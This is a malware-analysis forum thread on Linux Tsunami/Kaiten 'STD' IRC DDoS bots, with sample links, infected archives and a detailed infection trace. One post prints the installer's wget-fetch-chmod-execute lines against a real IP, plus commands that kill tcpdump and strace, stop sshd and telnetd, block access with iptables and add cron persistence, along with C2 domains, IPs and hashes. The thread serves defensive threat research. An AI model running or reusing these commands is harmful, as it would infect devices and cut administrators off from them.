A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #27639  by unixfreaxjp
 Wed Jan 13, 2016 9:15 pm
loonysquad uses "lame way" to :lol: encode :roll: the strings in the version of Tsunami/kaiten base they called STD bot. And using encrypted communication to poke CNC (checkin)
Samples:
https://www.virustotal.com/en/file/4ef7 ... /analysis/https://www.virustotal.com/en/file/6d87 ... /analysis/
Snapshot:
pic1 pic2
tip: Read the source codes snagged from them about ktx/STD botI shared 8-)
I don't know, maybe will mention this as ELF.STD.crypted..it's tsunami base anyway, don't need to open new variant repo.
Attachments
7z/infected
(28.21 KiB) Downloaded 68 times
 #27869  by unixfreaxjp
 Sat Feb 13, 2016 9:44 pm
Attachments
usual..
(288.85 KiB) Downloaded 59 times
 #27871  by unixfreaxjp
 Sun Feb 14, 2016 9:49 am
unixfreaxjp wrote:New type. Not a kaiten/tsunami/gayfgt but same actor...
Nah! I was wrong. The above case is a known kaiten STD bot, seems latest version with multiple PAN and XMAS attack.
So putting this update in this section is correct.
They built the ELF in a "new way" to avoid strings checking & stripped all symbol clean to looks "new", and that's it ;)
Well, apparently the attempt has failed. But they succeed to drop detection ratio a bit.
PoC:
Before decoding https://www.youtube.com/watch?v=81xg4LTQfI8
After decoding https://www.youtube.com/watch?v=E8gN_XUTCxM

Below is the malware infection work detail (text), shared for the shake of fighting badness in internet.
Code: Select all
# Some same-ol shitty installer

wget -c http://5.196.8.171/tty0 -P /var/run && chmod +x /var/run/tty0 && /var/run/tty0 &
wget -c http://5.196.8.171/tty1 -P /var/run && chmod +x /var/run/tty1 && /var/run/tty1 &
wget -c http://5.196.8.171/tty2 -P /var/run && chmod +x /var/run/tty2 && /var/run/tty2 &
wget -c http://5.196.8.171/tty3 -P /var/run && chmod +x /var/run/tty3 && /var/run/tty3 &
wget -c http://5.196.8.171/tty4 -P /var/run && chmod +x /var/run/tty4 && /var/run/tty4 &
wget -c http://5.196.8.171/tty5 -P /var/run && chmod +x /var/run/tty5 && /var/run/tty5 &
wget -c http://5.196.8.171/pty -P /var/run && chmod +x /var/run/pty && /var/run/pty &
rm -rf /var/run/1sh

# the ELF bins

2016/02/14  01:21 41,804 c8810d2c967ea872abceacb79d44b145 pty
2016/02/14  01:30 38,856 03db579ac3a28c5acac2253ebc24d3f2 tty0
2016/02/14  01:31 45,544 c54644d5d072122ac8d215fb69ce82d6 tty1
2016/02/14  01:32 41,112 1fc27da0273ce9245d179b9b7f30cd7f tty2
2016/02/14  01:32 49,860 a7764276a8e4a2d0aa51348926556fcb tty3
2016/02/14  01:32 45,452 8cd32ff8bb22e1c61e6eb69aaecdbe89 tty4
2016/02/14  01:32 43,308 fab538b846ac60226eba4f823345d425 tty5

# Multi architecture..lol

pty:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
tty0: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty2: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, stripped
tty3: ELF 32-bit MSB executable, ARM, version 1, statically linked, stripped
tty4: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
tty5: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

## Some readings...

open("/dev/null");
open("/dev/null");
access("/dev/shm/");
access("/var/tmp/");
access("/var/lock/");
access("/var/run/");
access("/tmp/");
....blah blah...

# PID set

open("/tmp/udevd0.pid", O_RDWR|O_CREAT, 0666);

# /temp preps

open("/tmp/toexec", O_RDONLY) ;

# The STUPID commands part, and PLEASE be STUPID as always :-)) hahaha!

# preventing monitoring..

execve("/bin/sh", ["sh", "-c", "killall -9 tcpdump > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 strace > /dev/null 2>&1 &"]

# setting resolve DNS to google

execve("/bin/sh", ["sh", "-c", "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"]

# killing fields of services and other ELF malware

execve("/bin/sh", ["sh", "-c", "killall -9 telnetd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service httpd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service telnetd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service sshd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 dropbear > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 minihttpd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "nvram set httpd_enable=0 > /dev/null 2>&1"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/wgsh > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/bbsh > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tt* > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tt* > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 utelnetd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 httpd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 arm > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 mips > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 mipsel > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 powerpc > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 ppc > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.i686.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mips.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"]

# dropping firewall rules for SSH, TELNET HTTP and PROXY for remote access..

execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 22 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 23 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 80 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 8080 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "chmod 700 /SAMPLE > /dev/null 2>&1 &"]

# grab the hostname

execve("/bin/uname", ["/bin/uname", "-n"]
write(1, "iSCREWskiddos\n", 8)

# installation...

execve("/bin/sh", ["sh", "-c", "(crontab -l | grep -v \"/SAMPLE\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/lock/.x001804289383) > /dev/null 2>&1"]
execve("/bin/sh", ["sh", "-c", "echo \"* * * * * /home/mong/test/cong > /dev/null 2>&1 &\" >> /var/lock/.x001804289383"]
execve("/bin/rm", ["rm", "-rf", "/var/lock/.x001804289383"]

# Boom, connecting to the IRC DDOS Botnet..

=> CONNECT: xxx.pokemoninc.com:8080
=> NICK x86|x|1|50xxxx|iSCREWskiddos
   USER x00 localhost localhost :feb012015
<= PING :FB1681F5
=> PONG :FB1681F5
<= :IRC!IRC@izu.ko PRIVMSG x86|x|1|50xxxx|iSCREWskiddos :1VERSION\1
   :izu.ko 001 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 002 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 003 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 004 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 375 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 372 x86|x|1|50xxxx|iSCREWskiddos :- 27/10/2014 11:36
   :izu.ko 372 x86|x|1|50xxxx|iSCREWskiddos :- !!
   :izu.ko 376 x86|x|1|50xxxx|iSCREWskiddos :
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
<= :x86|x|1|50xxxx|iSCREWskiddos!x00@1.1.1.1 JOIN :#x86

# yawn...

IPv4 TCP MMD-SCREW-LIZARD-AGAIN -> 211.103.199.98:8080 (ESTABLISHED)

# CNC:

;; QUESTION SECTION:
;xxx.pokemoninc.com.            IN      A

;; ANSWER SECTION:
xxx.pokemoninc.com.     1800    IN      A       211.103.199.98
xxx.pokemoninc.com.     1800    IN      A       203.141.196.14
xxx.pokemoninc.com.     1800    IN      A       61.156.43.106
xxx.pokemoninc.com.     1800    IN      A       202.103.224.85
xxx.pokemoninc.com.     1800    IN      A       83.143.80.227

;; AUTHORITY SECTION:
pokemoninc.com.         3600    IN      NS      dns4.name-services.com.
pokemoninc.com.         3600    IN      NS      dns1.name-services.com.
pokemoninc.com.         3600    IN      NS      dns5.name-services.com.
pokemoninc.com.         3600    IN      NS      dns2.name-services.com.
pokemoninc.com.         3600    IN      NS      dns3.name-services.com.


# MalwareMustDie! analysis by @unixfreaxjp
# Notes: Yow AntiChrist & Co. lizard looniez skeedooh!!, I screw your ELF shits "AGAIN".
# Get a REAL job kiddo! PS: Your linux skill still SUCKS..doubt anyone will hire ya.

#MalwareMustDie!
 #28023  by orbett
 Mon Mar 14, 2016 6:03 pm
UPX BadLuckJosh Linux/Tsunami, max. 5/57 on VirusTotal.

IP: 149.202.153.56
Code: Select all
9c9ff107486c1517ea450f6f40f70bda190cf1c0
ea3f9409e2346c7d0b39492c493924c07c916f09
63fe884dec6dc728069a45633ec2fa9a9f3a14f9
9f492fcf70cda93c4ed5f1c1095620596a8a61ad
d608a6b835e05ba443d33a522baff87cab45ec6a
241bef4bf1c13e942d92e5c2e714e627d2876c66
33bf638ef82c77cf31218efef9b2a58a5c360c88
c033993593de7cfe45edc862b5c86747280f938e
b1a5f9aec9a28eec00bedaf2e7ed8f0ce571f2d7
3d81efe3c32b6665fd610e4d6ae3ba604958d5f9
9e116703b9408f0ad1a48f8edd99e1592d96ac8b
5a0e334cc6d491ed36ec4f39d0935735aaafe6f6
8381989fdad449d2cbf2f993dd5e870962c0b8d9
cc4febbc9ddf33a6702e1a2800e6e596c2737a2c
757f419ad61038a8fc062f0864e99e059833ed8c
c36dda5f9c93f2cf48513bd96c7a3184b0a337d7
5eb57489e20529c0fc84261f3f8bb79607851eeb
51dc3f52fff6cebbf6ebd2616e6d4540a70200a6
4333b2c8f0cb21222c05458180cd09c60aec769e
e922e80b5d792ac682b4763c24f6112f5320ef73
8fcea554bfd57070677d5c79fddccf5a0c94d30b
26d2834ff062236a629e399aaa002fc5a56c5b84
ded044f476930247e906384b0b9a60169d61d31a
777ea97f87977499aaca6a0f19de2b399388a31f
062d8a413ba318bec73b8dde7004bf4546678d1c